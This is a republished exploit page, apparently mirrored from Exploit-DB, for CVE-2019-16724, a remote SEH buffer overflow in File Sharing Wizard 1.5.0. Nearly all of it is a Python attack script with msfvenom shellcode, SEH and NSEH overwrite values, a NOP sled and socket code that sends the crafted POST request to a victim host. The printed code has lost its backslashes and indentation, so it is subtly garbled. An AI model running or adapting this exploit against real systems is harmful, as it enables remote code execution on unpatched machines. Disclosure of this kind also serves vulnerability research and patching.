Exploit/Advisories

Published on September 24th, 2019 📆 | 7793 Views ⚑

0

File Sharing Wizard 1.5.0 – POST SEH Overflow


iSpeech

import socket
from struct import *

# Exploit Title: File sharing wizard 'post' remote SEH overflow
# Date: 9/23/2019
# Exploit Author: x00pwn
# Software Link: https://file-sharing-wizard.soft112.com/
# Version: 1.5.0
# Tested on: Windows 7
# CVE : CVE-2019-16724

# File-sharing-wizard-seh

#----------------------------------------------#
# Bad characters: x00        #
# SEH value:  0x909032EB  (JMP short)    #
# NSEH value: 0x7c38a67f (POP POP RET)  #
#----------------------------------------------#

#  Assigned CVE ID : CVE-2019-16724

victim_host = "10.0.0.17"
victim_port = 80

# msfvenom -p windows/exec CMD=calc.exe -b "x00" -f python -v shellcode EXITFUNC=seh
shellcode =  ""
shellcode += "xd9xc7xd9x74x24xf4xbax65x1dx84xe1x5f"
shellcode += "x29xc9xb1x31x31x57x18x03x57x18x83xef"
shellcode += "x99xffx71x1dx89x82x7axdex49xe3xf3x3b"
shellcode += "x78x23x67x4fx2ax93xe3x1dxc6x58xa1xb5"
shellcode += "x5dx2cx6exb9xd6x9bx48xf4xe7xb0xa9x97"
shellcode += "x6bxcbxfdx77x52x04xf0x76x93x79xf9x2b"
shellcode += "x4cxf5xacxdbxf9x43x6dx57xb1x42xf5x84"
shellcode += "x01x64xd4x1ax1ax3fxf6x9dxcfx4bxbfx85"
shellcode += "x0cx71x09x3dxe6x0dx88x97x37xedx27xd6"
shellcode += "xf8x1cx39x1ex3exffx4cx56x3dx82x56xad"
shellcode += "x3cx58xd2x36xe6x2bx44x93x17xffx13x50"
shellcode += "x1bxb4x50x3ex3fx4bxb4x34x3bxc0x3bx9b"
shellcode += "xcax92x1fx3fx97x41x01x66x7dx27x3ex78"
shellcode += "xdex98x9axf2xf2xcdx96x58x98x10x24xe7"
shellcode += "xeex13x36xe8x5ex7cx07x63x31xfbx98xa6"
shellcode += "x76xfdx69x7bx62x6axd0xeexcfxf6xe3xc4"
shellcode += "x13x0fx60xedxebxf4x78x84xeexb1x3ex74"
shellcode += "x82xaaxaax7ax31xcaxfex18xd4x58x62xf1"
shellcode += "x73xd9x01x0d"

nseh = pack ('<i ',0x909032EB) # Short jump forward 32 places into NOP sled
seh = pack('I',0x7c38a67f) # POP POP RET

# 0x7c38a67f : pop ecx # pop ecx # ret  |  {PAGE_EXECUTE_READ} [MSVCR71.dll]
# ASLR: False, Rebase: False, SafeSEH: False, OS: False, v7.10.6030.0 (C:Program Files (x86)File Sharing WizardbinMSVCR71.dll)

exploit_payload  = "A" * 1040
exploit_payload += nseh # JMP short
exploit_payload += seh # POPPOPRET
exploit_payload += "x90" * 100 # NOPSLED
exploit_payload += shellcode # popping calc.exe
exploit_payload += "D" *(5000 - len(exploit_payload))

payload_header  = "POST " + exploit_payload
payload_header +=" HTTP/1.0rnrn"

# overflowed SEH handler - 42386942 : [*] Exact match at offset 1044

try:
print("""
--------------------------------
CVE-2019-16724 proof of concept
File sharing wizard SEH overflow
--------------------------------
""")
expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print("[x] Setting up a socket connection")
expl.connect((victim_host, victim_port))
print("[x] Establishing a connection to the victim")
expl.send(payload_header)
print("[x] Sending ")
except:
print("[!] Error establishing a connection")
print("[!] Error sending exploit")





https://www.exploit-db.com/exploits/47412

Tagged with:



Comments are closed.






© Torchsec  Privacy Policy Disclaimer  T&C



Back to Top ↑